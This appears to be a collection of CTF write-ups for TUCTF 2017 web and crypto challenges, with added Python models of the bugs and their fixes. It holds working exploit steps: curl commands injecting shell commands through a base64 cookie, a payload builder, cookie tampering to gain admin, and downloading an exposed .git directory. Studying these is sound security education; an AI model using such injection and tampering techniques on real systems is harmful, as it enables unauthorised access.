Solution to TUCTF 2017 Cookie Harrelson

02/12/17 — capitol

tallahassee

name: Cookie Harrelson
category: web
points: 200

Writeup

On accessing the webpage we got this cookie: tallahassee=Y2F0IGluZGV4LnR4dA%3D%3D

Decoding the value with base64 revealed that it contained the string: cat index.txt

Playing around with the cookie showed that if we changed it, the string “cat index.txt#” was prepended to the supplied value and sent back.

Based on that we guessed that the server generated the webpage by executing the content of the cookie in a shell, with a pound character turning anything we supplied into a comment. A comment only lasts until the end of the line, so a value starting with a newline breaks out of it and whatever follows runs as a fresh command. First we ran ls to see that the flag file was simply called flag, then we read it.

curl 'http://cookieharrelson.tuctf.com/' -H "Cookie: tallahassee=`echo -e '\nls'|base64`"
curl 'http://cookieharrelson.tuctf.com/' -H "Cookie: tallahassee=`echo -e '\ncat flag'|base64`"

Flag was TUCTF{D0nt_3x3cut3_Fr0m_C00k13s}
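
As an added example (not part of the original writeup, and not the challenge's own code), here is a small model of the bug: the cookie is decoded and spliced into a shell command behind a fixed prefix, and a payload starting with a newline escapes the `#` comment. The hardened version beside it never runs a shell at all; the cookie can only pick a page from an allowlist. The server prefix, the web root contents and the flag text are constructed for the demonstration.

```python
import base64
import os
import subprocess
import tempfile
import urllib.parse

# Assumption: the server's fixed command, with a '#' meant to neutralise the cookie text.
SERVER_PREFIX = "cat index.txt #"


def decode_cookie(value):
    """Reverse what the browser sends: URL-decode, then base64-decode."""
    return base64.b64decode(urllib.parse.unquote(value)).decode()


def build_cookie(command):
    """Encode an injected command so that a leading newline ends the '#' comment.

    sh treats everything after '#' up to the end of the line as a comment, so
    the newline starts a fresh line and the injected command runs on its own.
    """
    payload = "\n" + command
    return urllib.parse.quote(base64.b64encode(payload.encode()).decode(), safe="")


def vulnerable_render(cookie_value, cwd):
    """Model of the challenge server: cookie text is spliced into a shell command."""
    script = SERVER_PREFIX + decode_cookie(cookie_value)
    proc = subprocess.run(["sh", "-c", script], cwd=cwd, capture_output=True, text=True)
    return proc.stdout


def safe_render(cookie_value, cwd):
    """Hardened version: the cookie only names a page in an allowlist; no shell runs."""
    pages = {"index": "index.txt"}
    try:
        page = decode_cookie(cookie_value)
    except (ValueError, UnicodeDecodeError):
        page = "index"
    filename = pages.get(page, "index.txt")
    with open(os.path.join(cwd, filename)) as f:
        return f.read()


def demo():
    """Build a throwaway web root (constructed data) and run both renderers on the injected cookie."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "index.txt"), "w") as f:
        f.write("welcome\n")
    with open(os.path.join(root, "flag"), "w") as f:
        f.write("TUCTF{constructed_flag}\n")
    cookie = build_cookie("cat flag")
    return {
        "original_decoded": decode_cookie("Y2F0IGluZGV4LnR4dA%3D%3D"),
        "vulnerable": vulnerable_render(cookie, root),
        "hardened": safe_render(cookie, root),
    }


if __name__ == "__main__":
    for name, output in demo().items():
        print(name, repr(output))
```

Running it shows the vulnerable renderer returning the index page followed by the flag, while the hardened one returns only the index page for the same cookie.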

Solution to TUCTF 2017 Git Gud

01/12/17 — capitol

eyes

name: Git Gud
category: web
points: 100

Writeup

The problem was a single web page with a Git Gud meme. A request to /.git/ showed that the .git directory had been deployed along with the site. After downloading the repository, the flag was easy to find in the git reflog, which still pointed at a commit that had been removed from the branch history.

wget -drc http://gitgud.tuctf.com/.git/
git reflog
git show 08cd273

flag was: TUCTF{D0nt_Us3_G1t_0n_Web_S3rv3r}
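
As an added example (not part of the original writeup), the following parses the file that makes this recovery possible, .git/logs/HEAD, and lists the commits a reset or amend left behind. It is what git reflog reads; once the directory is downloaded the log is plain text. The sample log, its commit ids and its author are constructed.

```python
import re
from collections import namedtuple

ReflogEntry = namedtuple("ReflogEntry", "old new who timestamp tz message")

# One reflog line: <old sha> <new sha> <name> <email> <unix time> <tz>\t<message>
LINE_RE = re.compile(
    r"^(?P<old>[0-9a-f]{40}) (?P<new>[0-9a-f]{40}) (?P<who>.+?) "
    r"(?P<ts>\d+) (?P<tz>[+-]\d{4})\t(?P<msg>.*)$"
)
NULL_SHA = "0" * 40

# Constructed sample of an exposed .git/logs/HEAD: a flag file is committed,
# removed, and the branch is then reset to before it ever existed.
SAMPLE_LOG = (
    NULL_SHA + " " + "a" * 40 + " Dev <dev@example.invalid> 1511900000 +0000\tcommit (initial): add meme page\n"
    + "a" * 40 + " " + "b" * 40 + " Dev <dev@example.invalid> 1511900100 +0000\tcommit: add flag file\n"
    + "b" * 40 + " " + "c" * 40 + " Dev <dev@example.invalid> 1511900200 +0000\tcommit: remove flag file\n"
    + "c" * 40 + " " + "a" * 40 + " Dev <dev@example.invalid> 1511900300 +0000\treset: moving to HEAD~2\n"
)


def parse_reflog(text):
    """Parse every line of a reflog file into ReflogEntry records (oldest first)."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unparseable reflog line: {line!r}")
        entries.append(ReflogEntry(m["old"], m["new"], m["who"], int(m["ts"]), m["tz"], m["msg"]))
    return entries


def current_head(entries):
    """The newest entry's target is where HEAD points now."""
    return entries[-1].new if entries else None


def abandoned_tips(entries):
    """Commits that a reset or amend moved HEAD away from.

    Their sha is still recorded as the 'old' side of that entry even though the
    branch no longer reaches them, so `git show <sha>` still works.
    """
    return [
        (e.old, e.message)
        for e in entries
        if e.old != NULL_SHA and (e.message.startswith("reset:") or e.message.startswith("commit (amend):"))
    ]


def format_like_git_reflog(entries):
    """Render entries the way `git reflog` prints them: newest first, abbreviated sha."""
    newest_first = list(reversed(entries))
    return [f"{e.new[:7]} HEAD@{{{i}}}: {e.message}" for i, e in enumerate(newest_first)]


if __name__ == "__main__":
    log = parse_reflog(SAMPLE_LOG)
    print("\n".join(format_like_git_reflog(log)))
    for sha, msg in abandoned_tips(log):
        print("inspect with git show:", sha[:7], "(", msg, ")")
```

The abandoned tip here is the commit that removed the flag; its parent, the commit that added it, is one `git show` or `git log <sha>` away, exactly the path taken in the writeup.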

Solution to TUCTF 2017 Cookie Duty

30/11/17 — capitol

cookies

name: Cookie Duty
category: web
points: 50

Writeup

We were presented with a page that had a simple form to set a name. When the form was posted, the server set a cookie named not_admin to 1, alongside a user cookie holding the base64-encoded name.

Since the cookie is under the client's control, we simply changed its value to 0 and requested the page again, like this:

curl 'http://cookieduty.tuctf.com/index.php' -H 'Host: cookieduty.tuctf.com' -H 'Cookie: not_admin=0; user=dGVzdA%3D%3D'

flag was TUCTF{D0nt_Sk1p_C00k13_Duty}
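
As an added example (not part of the original writeup, and not the challenge's code), here is the flaw next to one way of fixing it. The vulnerable check trusts a client-editable flag; the hardened one keeps the role in a value the server authenticates with an HMAC, so flipping the bit without the key fails verification. The server key and the session format are assumptions made for the example.

```python
import hashlib
import hmac
import secrets
from http.cookies import SimpleCookie

# Assumption: a per-deployment secret that the client never sees.
SERVER_KEY = secrets.token_bytes(32)


def parse_cookie_header(header):
    """Turn a raw Cookie: header value such as 'not_admin=0; user=dGVzdA%3D%3D' into a dict."""
    jar = SimpleCookie()
    jar.load(header)
    return {name: morsel.value for name, morsel in jar.items()}


def vulnerable_is_admin(cookies):
    """The challenge's check as the writeup describes it: a client-editable flag decides."""
    return cookies.get("not_admin") == "0"


def issue_session(user, is_admin, key=SERVER_KEY):
    """Server side: bind the role to the user and authenticate the whole value with HMAC-SHA256."""
    payload = f"{user}:{'1' if is_admin else '0'}"
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"


def read_session(cookie_value, key=SERVER_KEY):
    """Return (user, is_admin) only if the tag verifies; None for a missing or tampered cookie."""
    payload, sep, tag = cookie_value.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    user, _, flag = payload.rpartition(":")
    return user, flag == "1"


def hardened_is_admin(cookies, key=SERVER_KEY):
    """Privilege comes from the verified session, never from a bare flag."""
    session = read_session(cookies.get("session", ""), key)
    return session is not None and session[1]


if __name__ == "__main__":
    sent = parse_cookie_header("not_admin=0; user=dGVzdA%3D%3D")
    print("vulnerable:", vulnerable_is_admin(sent))
    session = issue_session("test", False)
    flipped = session.replace("test:0.", "test:1.")
    print("hardened, untouched:", hardened_is_admin({"session": session}))
    print("hardened, flipped  :", hardened_is_admin({"session": flipped}))
```

An even simpler fix is to keep the role entirely server side and give the client only an opaque session id; the signed cookie above is the minimal change that stops the bit flip.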

Solution to TUCTF 2017 High Source

29/11/17 — capitol

high_noon

name: High Source
category: web
points: 25

Writeup

This was easier than trivial, only 2 steps:

  • Look at the page source and get the password: I4m4M4st3rC0d3rH4x0rsB3w43
  • Enter the password and get redirected to this URL:

curl ‘http://highsource.tuctf.com/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flag’

flag was TUCTF{H1gh_S0urc3_3qu4ls_L0ng_F4ll}

Solution to TUCTF 2017 The Neverending Crypto

28/11/17 — capitol

CipherDisk

name: The Neverending Crypto
category: crypto
points: 50

Writeup

We were presented with a server that encrypted strings with a substitution cipher.

You were also able to give it up to twenty characters that the server encrypted for you.

The server didn't use the complete byte range, and it was a hassle to find out which characters were included in the substitution alphabet. The server leaked the plaintexts from time to time, and the number of distinct plaintexts it encrypted was small, only nine.

That meant we could write some simple heuristics to decide which string to send back: a substitution cipher maps the same plaintext character to the same ciphertext character every time, so the positions at which the ciphertext repeats a character tell us which of the known plaintexts we are looking at.

Implemented like this:

import re
import socket
import sys

sobj = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sobj.connect(("neverending.tuctf.com", 12345))
sobj.recv(1024)  # banner

re_question = re.compile(r"is (?P<question>.*) decrypted")
re_match = re.compile(r"a encrypted is (?P<chr>.)")


def workit():
    # Ask the server to encrypt "a"; the reply also carries the next challenge.
    sobj.sendall(b"a\n")

    hint = sobj.recv(1024).decode()
    print("hint", repr(hint))
    c = re_match.match(hint).groupdict()["chr"]  # ciphertext of "a", parsed but not needed below

    # The challenge looks like: What is :BB7RJBE>^R@BE8 decrypted?
    question = re_question.findall(hint)[0]
    print("Question is", question)
    answer = ""
    # Each test compares positions that hold the same character in one of the
    # known plaintexts. Later matches override earlier ones.
    if question[1] == question[10]:
        answer = "how many more??"
    if question[11] == question[13]:
        answer = "something here."
    if question[1] == question[5]:
        answer = "you got lucky.."
    if question[12] == question[13]:
        answer = "you have skills"
    if question[1] == question[2]:
        answer = "good work, more"
    if question[1] == question[9]:
        answer = "you crypto wiz!"
    if question[13] == question[14] and question[1] == question[10]:
        answer = "how many more??"
    if question[1] == question[13]:
        answer = "welcome, hacker"
    if question[1] == question[6] and question[1] == question[13] and question[3] == question[10]:
        answer = "dont forget to "
    if answer == "":
        print("I DO NOT KNOW")
        sys.exit()
    print(answer)
    sobj.sendall((answer + "\n").encode())


while True:
    workit()
    print(sobj.recv(1024).decode())
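
As an added example (not part of the original writeup), the hand-written position checks above generalise into one rule: fingerprint each text by which positions hold equal characters, and pick the known plaintext whose fingerprint equals the ciphertext's. The eight plaintexts listed below are the ones the checks above recognise (the page mentions nine, but the ninth does not appear there). The toy cipher used to exercise the matcher offline is constructed for this example; the sample challenge string is the one quoted in the code comment above.

```python
import random
import string

# The plaintexts the writeup's checks recognise (the ninth is not given on the page).
KNOWN_PLAINTEXTS = [
    "how many more??",
    "something here.",
    "you got lucky..",
    "you have skills",
    "good work, more",
    "you crypto wiz!",
    "welcome, hacker",
    "dont forget to ",
]


def pattern(text):
    """Fingerprint of which positions hold equal characters.

    Every character becomes the index of its first appearance, so 'good' ->
    (0, 1, 1, 2). A monoalphabetic substitution changes the characters but
    can never change this fingerprint.
    """
    seen = {}
    return tuple(seen.setdefault(ch, len(seen)) for ch in text)


def identify(ciphertext, candidates=KNOWN_PLAINTEXTS):
    """Return the single candidate whose fingerprint matches the ciphertext, else None."""
    target = pattern(ciphertext)
    matches = [p for p in candidates if pattern(p) == target]
    return matches[0] if len(matches) == 1 else None


def fingerprints_are_distinct(candidates=KNOWN_PLAINTEXTS):
    """True when no two candidates share a fingerprint, i.e. the rule is unambiguous."""
    return len({pattern(p) for p in candidates}) == len(candidates)


def substitution_map(ciphertext, plaintext):
    """Derive the cipher->plain mapping a match implies, rejecting inconsistent pairs."""
    mapping = {}
    for c, p in zip(ciphertext, plaintext):
        if mapping.setdefault(c, p) != p:
            raise ValueError("inconsistent substitution")
    return mapping


def toy_encrypt(plaintext, seed=1):
    """Constructed substitution cipher, used only to exercise identify() offline."""
    alphabet = string.printable[:-5]  # printable ASCII, keeping the space but no other whitespace
    shuffled = list(alphabet)
    random.Random(seed).shuffle(shuffled)
    key = dict(zip(alphabet, shuffled))
    return "".join(key[ch] for ch in plaintext)


if __name__ == "__main__":
    print("distinct:", fingerprints_are_distinct())
    print(":BB7RJBE>^R@BE8 ->", identify(":BB7RJBE>^R@BE8"))
    for p in KNOWN_PLAINTEXTS:
        print(repr(toy_encrypt(p)), "->", identify(toy_encrypt(p)))
```

The quoted challenge string `:BB7RJBE>^R@BE8` has the fingerprint of "good work, more", which is also what the `question[1] == question[2]` check above would have answered; the fingerprint rule just covers all eight strings with one comparison each and reports when none matches instead of guessing.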